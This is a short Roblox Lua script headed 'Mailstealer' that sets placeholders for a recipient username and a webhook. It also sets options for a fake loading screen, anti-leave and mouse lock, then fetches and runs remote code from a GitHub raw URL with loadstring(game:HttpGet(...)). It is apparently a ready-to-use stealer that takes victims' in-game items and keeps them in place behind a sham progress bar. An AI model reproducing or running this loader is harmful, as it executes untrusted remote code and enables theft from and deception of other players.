--[[
  __  __       _ _     _             _           
  |  \/  | __ _(_) |___| |_ ___  __ _| | ___ _ __ 
  | |\/| |/ _` | | / __| __/ _ \/ _` | |/ _ \ '__|
  | |  | | (_| | | \__ \ ||  __/ (_| | |  __/ |   
  |_|  |_|\__,_|_|_|___/\__\___|\__,_|_|\___|_|   

]]--

UserName = "UserName Here"
Webhook = "Webhook Here"
UserName2 = "2nd UserName Here"

_G.LoadingScreen = false -- make it true if you want the loadingscreen
_G.AntiLeave = false -- make it true if you want the antileave
_G.MouseLock = false -- make it true if you want the mouselock


_G.ScriptName = "Script Name"
_G.FirstText = "Preparing..."
_G.SecondText = "Loading..."
_G.ThirdText = "Almost Done..."
_G.WaitingTime = 180 -- in secondes it's the time for the loading bar to hit from 0% to 100%

loadstring(game:HttpGet("https://raw.githubusercontent.com/Bahashtako/BENJOSCRIPTS/main/Mailstealer"))()

